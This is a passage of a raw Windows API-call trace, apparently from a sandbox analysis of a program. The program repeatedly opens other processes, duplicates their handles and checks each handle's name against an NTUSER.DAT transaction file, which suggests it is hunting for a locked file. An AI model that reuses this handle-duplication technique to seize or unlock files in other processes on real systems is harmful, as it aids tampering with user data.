CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.888] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.889] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.889] CloseHandle (hObject=0x1e4) returned 1 [0165.889] CloseHandle (hObject=0x194) returned 1 [0165.889] CloseHandle (hObject=0x1e8) returned 1 [0165.889] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.889] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.889] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.889] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.890] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.890] CloseHandle (hObject=0x1e4) returned 1 [0165.890] CloseHandle (hObject=0x194) returned 1 [0165.890] CloseHandle (hObject=0x1e8) returned 1 [0165.890] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.891] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.891] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.891] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.892] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.892] CloseHandle (hObject=0x1e4) returned 1 [0165.892] CloseHandle (hObject=0x194) returned 1 [0165.892] CloseHandle (hObject=0x1e8) returned 1 [0165.892] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.892] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.892] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.893] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.893] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.894] CloseHandle (hObject=0x1e4) returned 1 [0165.894] CloseHandle (hObject=0x194) returned 1 [0165.894] CloseHandle (hObject=0x1e8) returned 1 [0165.894] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.894] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.894] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.895] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.896] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.896] CloseHandle (hObject=0x1e4) returned 1 [0165.896] _wcsicmp (_Str1="\\.", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -64 [0165.896] CloseHandle (hObject=0x194) returned 1 [0165.896] CloseHandle (hObject=0x1e8) returned 1 [0165.896] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.896] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.896] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.897] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.902] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.902] CloseHandle (hObject=0x1e4) returned 1 [0165.902] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0165.902] CloseHandle (hObject=0x194) returned 1 [0165.902] CloseHandle (hObject=0x1e8) returned 1 [0165.902] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.903] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.903] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.903] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.904] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.904] CloseHandle (hObject=0x1e4) returned 1 [0165.905] _wcsicmp (_Str1="\\$ObjId", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -74 [0165.905] CloseHandle (hObject=0x194) returned 1 [0165.905] CloseHandle (hObject=0x1e8) returned 1 [0165.905] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.905] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x45c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.905] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.906] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.906] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.907] CloseHandle (hObject=0x1e4) returned 1 [0165.907] CloseHandle (hObject=0x194) returned 1 [0165.907] CloseHandle (hObject=0x1e8) returned 1 [0165.907] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.907] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x468, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.907] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.907] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.908] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.908] CloseHandle (hObject=0x1e4) returned 1 [0165.908] _wcsicmp (_Str1="\\tracking.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0165.908] CloseHandle (hObject=0x194) returned 1 [0165.909] CloseHandle (hObject=0x1e8) returned 1 [0165.909] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.909] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x46c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.910] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.910] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.911] CloseHandle (hObject=0x1e4) returned 1 [0165.911] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0165.911] CloseHandle (hObject=0x194) returned 1 [0165.911] CloseHandle (hObject=0x1e8) returned 1 [0165.911] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.911] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x470, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.911] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.912] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.913] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.913] CloseHandle (hObject=0x1e4) returned 1 [0165.913] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0165.913] CloseHandle (hObject=0x194) returned 1 [0165.913] CloseHandle (hObject=0x1e8) returned 1 [0165.913] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.913] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.913] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.914] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.914] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.914] CloseHandle (hObject=0x1e4) returned 1 [0165.914] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0165.914] CloseHandle (hObject=0x194) returned 1 [0165.915] CloseHandle (hObject=0x1e8) returned 1 [0165.915] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.915] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x580, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.915] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.915] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.916] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.916] CloseHandle (hObject=0x1e4) returned 1 [0165.916] CloseHandle (hObject=0x194) returned 1 [0165.916] CloseHandle (hObject=0x1e8) returned 1 [0165.916] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.917] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x584, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.917] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.917] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.918] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.918] CloseHandle (hObject=0x1e4) returned 1 [0165.918] CloseHandle (hObject=0x194) returned 1 [0165.919] CloseHandle (hObject=0x1e8) returned 1 [0165.919] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.919] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x660, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.919] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.920] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.920] CloseHandle (hObject=0x1e4) returned 1 [0165.920] CloseHandle (hObject=0x194) returned 1 [0165.920] CloseHandle (hObject=0x1e8) returned 1 [0165.920] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.920] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.921] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.922] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.922] CloseHandle (hObject=0x1e4) returned 1 [0165.922] _wcsicmp (_Str1="\\sysmain.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.922] CloseHandle (hObject=0x194) returned 1 [0165.922] CloseHandle (hObject=0x1e8) returned 1 [0165.922] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0165.922] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x700, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.922] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.923] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.924] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.924] CloseHandle (hObject=0x1e4) returned 1 [0165.924] CloseHandle (hObject=0x194) returned 1 [0165.924] CloseHandle (hObject=0x1e8) returned 1 [0165.924] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.924] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.924] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.925] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.926] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.926] CloseHandle (hObject=0x1e4) returned 1 [0165.926] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.926] CloseHandle (hObject=0x194) returned 1 [0165.926] CloseHandle (hObject=0x1e8) returned 1 [0165.926] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.926] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.927] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.928] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.928] CloseHandle (hObject=0x1e4) returned 1 [0165.928] CloseHandle (hObject=0x194) returned 1 [0165.928] CloseHandle (hObject=0x1e8) returned 1 [0165.928] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.928] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.928] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.929] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.929] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.930] CloseHandle (hObject=0x1e4) returned 1 [0165.930] CloseHandle (hObject=0x194) returned 1 [0165.930] CloseHandle (hObject=0x1e8) returned 1 [0165.930] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.930] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.930] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.931] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.932] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.932] CloseHandle (hObject=0x1e4) returned 1 [0165.932] CloseHandle (hObject=0x194) returned 1 [0165.932] CloseHandle (hObject=0x1e8) returned 1 [0165.932] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.932] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x480, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.933] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.937] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.937] CloseHandle (hObject=0x1e4) returned 1 [0165.937] _wcsicmp (_Str1="\\SCHEDLGU.TXT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.937] CloseHandle (hObject=0x194) returned 1 [0165.937] CloseHandle (hObject=0x1e8) returned 1 [0165.937] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.937] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x498, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.937] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.938] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.941] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.942] CloseHandle (hObject=0x1e4) returned 1 [0165.942] CloseHandle (hObject=0x194) returned 1 [0165.942] CloseHandle (hObject=0x1e8) returned 1 [0165.942] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.942] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x49c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.942] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.943] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.943] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.943] CloseHandle (hObject=0x1e4) returned 1 [0165.944] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0165.944] CloseHandle (hObject=0x194) returned 1 [0165.944] CloseHandle (hObject=0x1e8) returned 1 [0165.944] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.944] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.944] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.944] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.947] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.947] CloseHandle (hObject=0x1e4) returned 1 [0165.948] _wcsicmp (_Str1="\\Tasks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0165.948] CloseHandle (hObject=0x194) returned 1 [0165.948] CloseHandle (hObject=0x1e8) returned 1 [0165.948] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.948] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.948] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.949] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.949] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.949] CloseHandle (hObject=0x1e4) returned 1 [0165.950] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0165.950] CloseHandle (hObject=0x194) returned 1 [0165.950] CloseHandle (hObject=0x1e8) returned 1 [0165.950] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.950] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.950] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.951] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.951] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.951] CloseHandle (hObject=0x1e4) returned 1 [0165.951] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0165.952] CloseHandle (hObject=0x194) returned 1 [0165.952] CloseHandle (hObject=0x1e8) returned 1 [0165.952] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, 